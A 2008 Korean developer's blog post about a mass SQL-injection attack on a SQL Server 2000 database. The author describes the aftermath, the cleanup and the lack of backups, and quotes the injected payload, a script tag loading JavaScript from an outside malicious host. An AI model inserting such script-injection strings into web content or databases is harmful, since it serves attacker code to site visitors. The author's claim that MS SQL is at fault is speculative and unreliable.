Recent Posts
Recent Comments
청자몽의 하루
Windows2003 서버에 SQL 2000 - nihaorr script 공격때문에 난리났었어요!!! 본문
반응형
오늘 아주 난리가 났었다. Widnows 2003서버에 있는 SQL2000가 테러 당한 것.
50자 이상 되는 field들에 글자들에 강제로 script src=http://www.nihaorr<script src=http://www.nihaorr1.com/1.js 이런 식의 글자들이 들어와 박혔다.
사이트가 엉망이 되었다. 페이지는 안 뜨고 무슨 중국어 문자팩 깔라는 alert페이지만 엄천 뜨다가 웹브라우저가 죽었다.
게다가 더 큰 문제는 DB 백업을 하나도 받아놓지 않았다는 점.
테러당한 테이블에서 일일이 저 요사시런 글자들은 다 지우느라고 고생했고, laptop cordinator는 주요 고객 사이트에 front 데이터를 다 채워넣느라고 고생했다.
어떤 식으로 통로가 뚫려서 저 글자들이 DB field에 강제로 박혔는지 알 수가 없다.
검색해보면 피해본 사이트가 천지에 깔려있는데 대책이 없다. MS SQL에 심각한 문제가 있는거 같은데!! 대책을 적어놓은 곳은 없다. 혹시 DB 백업 안 받아놓은 MS-SQL 사용 사이트들은 조심하셔야 할듯..
반응형
'[글]쓰기 > 개발자 노트' 카테고리의 다른 글
IT 추천 블로그라는데;; - 유명한 곳들인감요? (0) | 2008.08.14 |
---|---|
[펌]Dear Bill - 출처: 마이크로소프트 Hero 블로그 (0) | 2008.07.21 |
IT이야기 이벤트에 당첨됐어요 : ) [Hero 블로그] (2) | 2008.04.03 |
어도비, 온라인용「포토샵 익스프레스」베타 ... 쓸만한데요!! (0) | 2008.03.29 |
Hero 블로그.. 개발자들의 이야기가 꽤 많이 올라왔다 (0) | 2008.03.16 |
Comments